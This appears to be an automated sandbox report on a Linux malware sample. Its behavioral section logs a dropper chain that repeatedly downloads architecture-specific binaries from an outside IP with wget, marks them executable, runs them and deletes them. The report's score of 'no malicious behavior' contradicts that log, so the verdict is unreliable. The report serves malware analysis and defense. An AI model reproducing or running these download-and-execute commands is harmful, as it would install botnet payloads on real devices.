Malware Analysis Report

2025-08-11 05:14

Sample ID 240505-cxymhaca51
Target 15917961bac6063481040fcc4af85061_JaffaCakes118
SHA256 f7e374f479296d08a98d549c93433ec13ddeaf6835ea9d76d0bf33c23ff24682
Tags
score
1/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
1/10

SHA256

f7e374f479296d08a98d549c93433ec13ddeaf6835ea9d76d0bf33c23ff24682

Threat Level: No (potentially) malicious behavior was detected

The file 15917961bac6063481040fcc4af85061_JaffaCakes118 was found to be: No (potentially) malicious behavior was detected.

Malicious Activity Summary

N/A

MITRE ATT&CK

N/A

Analysis: static1

Detonation Overview

Reported

2024-05-05 02:27

Signatures

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-05-05 02:27

Reported

2024-05-05 03:02

Platform

debian9-mipsbe-20240418-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-05-05 02:27

Reported

2024-05-05 03:03

Platform

debian9-mipsel-20240226-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-05 02:27

Reported

2024-05-05 03:05

Platform

ubuntu1804-amd64-20240418-en

Max time kernel

36s

Max time network

129s

Command Line

[/tmp/15917961bac6063481040fcc4af85061_JaffaCakes118]

Signatures

N/A

Processes

/tmp/15917961bac6063481040fcc4af85061_JaffaCakes118

[/tmp/15917961bac6063481040fcc4af85061_JaffaCakes118]

/usr/bin/wget

[wget http://45.95.168.138/mips]

/bin/chmod

[chmod +x mips]

/tmp/mips

[./mips]

/bin/rm

[rm -rf mips]

/usr/bin/wget

[wget http://45.95.168.138/mipsel]

/bin/chmod

[chmod +x mipsel]

/tmp/mipsel

[./mipsel]

/bin/rm

[rm -rf mipsel]

/usr/bin/wget

[wget http://45.95.168.138/sh4]

/bin/chmod

[chmod +x sh4]

/tmp/sh4

[./sh4]

/bin/rm

[rm -rf sh4]

/usr/bin/wget

[wget http://45.95.168.138/x86]

/bin/chmod

[chmod +x x86]

/tmp/x86

[./x86]

/bin/rm

[rm -rf x86]

/usr/bin/wget

[wget http://45.95.168.138/armv6l]

/bin/chmod

[chmod +x armv6l]

/tmp/armv6l

[./armv6l]

/bin/rm

[rm -rf armv6l]

/usr/bin/wget

[wget http://45.95.168.138/i686]

/bin/chmod

[chmod +x i686]

/tmp/i686

[./i686]

/bin/rm

[rm -rf i686]

/usr/bin/wget

[wget http://45.95.168.138/powerpc]

/bin/chmod

[chmod +x powerpc]

/tmp/powerpc

[./powerpc]

/bin/rm

[rm -rf powerpc]

/usr/bin/wget

[wget http://45.95.168.138/i586]

/bin/chmod

[chmod +x i586]

/tmp/i586

[./i586]

/bin/rm

[rm -rf i586]

/usr/bin/wget

[wget http://45.95.168.138/m68k]

/bin/chmod

[chmod +x m68k]

/tmp/m68k

[./m68k]

/bin/rm

[rm -rf m68k]

/usr/bin/wget

[wget http://45.95.168.138/sparc]

/bin/chmod

[chmod +x sparc]

/tmp/sparc

[./sparc]

/bin/rm

[rm -rf sparc]

/usr/bin/wget

[wget http://45.95.168.138/armv4l]

/bin/chmod

[chmod +x armv4l]

/tmp/armv4l

[./armv4l]

/bin/rm

[rm -rf armv4l]

/usr/bin/wget

[wget http://45.95.168.138/armv5l]

/bin/chmod

[chmod +x armv5l]

/tmp/armv5l

[./armv5l]

/bin/rm

[rm -rf armv5l]

Network

Country Destination Domain Proto
US 151.101.194.49:443 tcp
GB 185.125.188.61:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.129.91:443 tcp
US 151.101.129.91:443 tcp
HR 45.95.168.138:80 tcp
N/A 224.0.0.251:5353 udp
GB 195.181.164.19:443 tcp
HR 45.95.168.138:80 tcp
HR 45.95.168.138:80 tcp
HR 45.95.168.138:80 tcp
HR 45.95.168.138:80 tcp
HR 45.95.168.138:80 tcp
HR 45.95.168.138:80 tcp
HR 45.95.168.138:80 tcp
HR 45.95.168.138:80 tcp
HR 45.95.168.138:80 tcp
HR 45.95.168.138:80 tcp
HR 45.95.168.138:80 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-05 02:27

Reported

2024-05-05 03:05

Platform

debian9-armhf-20240418-en

Max time network

38s

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

Country Destination Domain Proto
HR 45.95.168.138:80 tcp
HR 45.95.168.138:80 tcp
HR 45.95.168.138:80 tcp
HR 45.95.168.138:80 tcp
HR 45.95.168.138:80 tcp
HR 45.95.168.138:80 tcp
HR 45.95.168.138:80 tcp
HR 45.95.168.138:80 tcp
HR 45.95.168.138:80 tcp
HR 45.95.168.138:80 tcp
HR 45.95.168.138:80 tcp
HR 45.95.168.138:80 tcp

Files

N/A